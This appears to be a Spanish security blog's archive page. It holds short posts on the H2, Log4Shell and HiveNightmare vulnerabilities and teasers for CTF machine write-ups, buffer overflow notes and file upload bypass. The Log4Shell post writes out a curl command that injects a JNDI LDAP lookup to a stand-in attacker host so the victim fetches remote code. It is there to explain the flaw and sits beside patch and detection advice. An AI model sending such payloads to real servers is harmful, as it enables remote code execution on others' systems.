Buscar

Mostrando entradas con la etiqueta hacking. Mostrar todas las entradas
Mostrando entradas con la etiqueta hacking. Mostrar todas las entradas

07 enero 2022

RCE en consola de BBDD H2 (CVE-2021-42392)

No hace aún un mes que escribí sobre la ya conocidísima vulnerabilidad de Log4Shell. Pues bien, ahora nos encontramos ante un nuevo RCE, en este caso en la base de datos Java SQL, bautizada como CVE-2021-42392. Si te interesa saber más sobre este nuevo problema, continúa leyendo.


H2:

Los investigadores de JFrog han sido los que han reportado este nuevo problema. H2 es una BBDD en Java SQL bastante popular y de código abierto, que no necesita que los datos se almacenen en disco.

Algunas plataformas como Spring Boot, Play Framework y JHipster y otras de IoT como ThingWorks la utilizan, por lo que podría ser de una alta criticidad. 

Versiones afectadas:

Esta vulnerabilidad afecta a las versiones de H2 Console desde la v1.1.100 (de 2008) a la v2.0.204 (de diciembre de 2021) y permitiría la carga de clases desde el servidor de un atacante a través de JNDI, aunque a priori, H2 no acepta por defecto conexiones remotas.

Explotabilidad:

Según los investigadores de JFrog, la vulnerabilidad se explota de forma parecida a Log4Shell, JNDI podría permitir un RCE dando a un atacante control sobre los sistemas de una organización, aunque advierten que en un principio no debería estar tan extendido como Log4Shell.

Al contrario que ocurría con Log4Shell, este fallo tiene un alcance directo, y el servidor que procesa la solicitud sería el afectado por el RCE, lo que, según los investigadores, debería ser menos grave que Log4Shell.

Como mencionaba anteriormente, por defecto, la consola de H2 no escucha conexiones externas (solo las de local host), por lo que la configuración predeterminada, debería ser segura, no como en el caso de Log4Shell que ya era explotable la configuración por defecto. El problema viene dado por la facilidad que existe para cambiar ese parámetro para que también escuche conexiones de fuera.

Solución:

Esta vulnerabilidad ya cuenta con una versión que soluciona el problema (no como ocurría con Log4Shell que estuvo días sin parche) la v2.0.206 que limita las URL de JNDI y deniega cualquier tipo de consulta al LDAP de manera remota. Por lo tanto, ¡corre a parchear!

Fuente: https://thehackernews.com/2022/01/log4shell-like-critical-rce-flaw.html

11 diciembre 2021

LOG4SHell otro RCE (CVE-2021-44228)

Hace unos días (9 de diciembre) apareció un nuevo RCE, aunque se dio a conocer el 24 de noviembre a través del equipo de seguridad de Alibaba Cloud.

LOG4SHell es un Zero day en la biblioteca de registro de Java log4j2 que da por resultado un RCE (ejecución de código remota) a través del registro de una string concreta.

Log4j es una biblioteca de código abierto desarrollada en Java por la Apache Software Foundation que permite a los desarrolladores de software escribir mensajes de registro (segun wikipedia).

La vulnerabilidad se ha registrado como CVE-2021-44228. Esta se considera de carácter crítico, ya que aparece con un CVE de 10 (el más alto).

Log4j es un sistema bastante utilizado, por lo que se están viendo afectados desde servicios en la nube, como iCloud hasta aplicaciones como Minecraft (hay POC sobre esto). Por ello, cualquier aplicación que use SpringBoot con Java, seguramente esté expuesta en este momento.

Si tienes instalada una versión desde la 2.0 a la 2.14.1 eres vulnerable a este RCE. Aunque según cuentan desde Alibaba, el software concreto afectado sería:

  • Apache Flink
  • Apache Solr
  • Apache Druid
  • Apache Struts2 (recordemos que este ya tuvo su CVE el año pasado)

Un atacante, podría enviar una solicitud maliciosa al servidor atacado a través del protocolo HTTP (Curl, o cualquier otro). El servidor recibiría la solicitud. La versión vulnerable de Log4j permitiría su ejecución, y el servidor atacado realizaría una petición a un servidor del atacante que se "traería" el exploit (fichero culo.class, por ejemplo xD), el cual se inyectaría en el servidor víctima y, por último, ese exploit se ejecutaría:

curl X.X.X.X:8000 -H 'X-Api-Version: ${jndi:ldap://culo.es/exp}'

Para una explicación más completa acerca de la POC, puedes visitar este GitHub.

Cas van Cooten tuiteó el mismo día 10, que simplemente con cambiar el nombre en un iPhone, desencadena dicha vulnerabilidad. 


Para detectar este ataque, hay un repositorio de GitHub de cyb3rops con reglas de Yara (herramienta para la detección de malware basada en reglas). Además, se han añadido ya a IDS como Snort o Suricata.

Actualización:

Parece ser que con la versión 2.15.0 de Log4j se corregiría este problema, así que, ya sabes. Si tienes alguna de las versiones afectadas, ¡actualiza ya!

Nos vemos en la siguiente.

09 noviembre 2021

Máquina BoilerCTF THM

Acabo de terminar la máquina BoilerCTF de la plataforma THM. La verdad que esta máquina no es difícil, pero hasta que das con la clave, madre mía...

Si quieres saber como la he resuelto finalmente, te recomiendo que sigas leyendo.


08 noviembre 2021

Máquina Wonderland THM

Recientemente he terminado la máquina Wonderland de la plataforma THM. Me ha parecido entretenida, pero muy rebuscada (lo que no es sinónimo de mala).

Si quieres saber como he resuelto esta máquina, te recomiendo que sigas leyendo.


03 noviembre 2021

Máquina Vulnet:active THM

 Acabo de terminar la máquina Vulnet:active de THM. Lo primero decir que empiezo a estar cabreado con esta plataforma, me ha llevado muchas horas terminar la máquina porque a pesar de ser VIP y de tener las 2 horas sin terminar, se me apagaba la máquina constantemente.

Si quiere ver como soluciono este reto, te animo a que sigas leyendo.

01 noviembre 2021

Máquina Temple THM

Acabo de terminar la máquina Temple de THM y tengo que esta máquina es una fumadita del carajo. Creo que es nivel hard como pone en la web, al menos para mí. 

Si quieres saber como se resuelve la máquina Zeno de THM, te recomiendo que sigas leyendo.


31 octubre 2021

Máquina Zeno THM

Acabo de terminar la máquina Zeno de THM y os voy a dejar la guía para solucionar la máquina. La verdad que ha estado entretenida. 

El nivel para el flag de usuario es medio/bajo y para hacerse con la de root, digamos que medio.

Si quieres saber como se resuelve la máquina Zeno de THM, te recomiendo que sigas leyendo.


16 agosto 2021

SMB Relay (un poquito de teoría)

Hoy la entrada no va sobre soluciones de máquinas, la última certificación que he obtenido ni de Buffer Overflow. Vamos a ver un poco de teoría (¡uhhhh fueraaaa! Teoría caca) sobre los ataques de retransmisión SMB (SMB relay). 

Siempre me paro a explicar todo en la práctica, pero creo firmemente que hay que saber de qué se habla en cada caso. Así que, te animo a que sigas leyendo.

12 agosto 2021

Máquina OverPAss 2 de TryHackMe

Os traigo una solución a una máquina TryHackMe que acabo de terminar hace 5 minutos, así que, aún está caliente xD.

Comparto esta máquina porque se sale un poco de lo convencional teniendo que analizar un fichero con Wireshark, que hacía un tiempo que no tocaba nada. La máquina no es muy difícil, pero la comparto precisamente por salirse "de la norma".

Si quieres saber como se soluciona esta máquina, te recomiendo que sigas leyendo.

10 agosto 2021

Máquina Alfred de TryHackMe

Hoy os dejo esta solución a la máqina Alfred de TryHackMe. No es que tenga nada de especial, es más porque se usa metasploit (así lo piden) y como digo al final,  a veces por tiempo es necesario. Y además, que narices, en este mundillo hay que saber utilizar todas las herramientas que tengamos al alcance, y esta es una de ellas.

Si quieres saber como se resuelva esta máquina, te recomiendo que sigas leyendo.

03 agosto 2021

01 agosto 2021

Road to OSCP (y más)




Hoy os quiero compartir un fichero en el que he estado recolectando algunas máquinas de HTB, THM, cursos, vídeos, etc. Además de herramientas imprescindibles y recursos que deberíais conocer.

Si quieres conocer este conjunto de herramientas y demás, sigue leyendo.

30 julio 2021

Gatekeeper TryHackMe (OSCP Style)

Os dejo una nueva entrada sobre BOF, en este caso es una máquina de THM en la que podemos explotar una vulnerabilidad de Buffer Overflow (stack). Además, veremos la forma de enumerar el sistema Windows y la forma de escalar privilegios, que siendo sincero, me ha llevado un buen rato darme cuenta.

Si quieres saber como he resuelto esta máquina, sigue leyendo.

28 julio 2021

BOF VulnServer + Sorpresa

Comenzamos con una nueva entrada sobre BOF (Buffer Over Flow), en este caso me lio la manta a la cabeza y empiezo a hacerlo yo solo (es la única forma de aprender xD).

En este caso estoy usando como software VulnServer. Lo he encontrado rebuscando en Google y que podéis descargar de su GitHub.

Si quieres saber cuál es la sorpresa, sigue leyendo.

23 julio 2021

BOF OSCP Style


Vuelvo con una entrada de BOF (Buffer OverFlow) en este caso una que podría caer en el exámen del OSCP (eso me han dicho xD). 

Antes de nada, dejar claro que esto solo lo tengo a modo de apuntes, es del vídeo de S4vitar https://www.youtube.com/watch?v=sdZ8aE7yxMk el cual os recomiendo encarecidamente que veáis (la lectura es tal cual lo que explica él en el vídeo). Luego no quiero comentarios absurdos, ya lo dejo yo claro desde el primer párrafo.

Si quieres enterarte como hacer esta máquina sigue leyendo.

21 julio 2021

CVE-2021-36934 (HiveNightmare)

Si hace muy poco se hablaba por todas las RR.SS sobre la vulnerabilidad de la cola de impresión AKA PrintNightmare (CVE-2021-1675), de la que puedes leer más aquí, ahora la gente de Microsoft se les escapa otra. 

En este caso parece que se ha dado permiso de lectura de usuario al fichero SAM y a los archivos del registro SYSTEM y SECURITY, lo que indica que cualquier usuario podría acceder al fichero y conseguir los hashes NTLM.

Si quieres enterarte de todo y ver como lo podemos explotar, sigue leyendo.

Maquina Brainpan TryHackMe

Bueno, pues llegó el momento de darle cera al BOF (Buffer OverFlow). 

Antes de nada, dejar claro que esto solo lo tengo a modo de apuntes, es del vídeo de S4vitar https://www.youtube.com/watch?v=WNOIFthiX_0 el cual os recomiendo encarecidamente que veáis (la lectura es tal cual lo que explica él en el vídeo). Luego no quiero comentarios absurdos, ya lo dejo yo claro desde el primer párrafo.

Si quieres enterarte como hacer esta máquina sigue leyendo.

12 julio 2021

Máquina Jerry HTB

Hoy os dejo la resolución de una de las máquinas de HTB de nivel fácil. Es cortita, así que si estás preparado, levanta tu Kali (Parrot, o la que uses) y vamos a ello.

Sigue leyendo para enterarte de todo.

05 julio 2021

04 julio 2021

File Upload, ¿Qué revisar?

Hoy traigo una entrada en la que vamos a ver distintas opciones para poder bypasear el conocido como file upload.

Si quieres enterarte de todo, y ver las múltiples opciones que vamos a estar usando, sigue leyendo.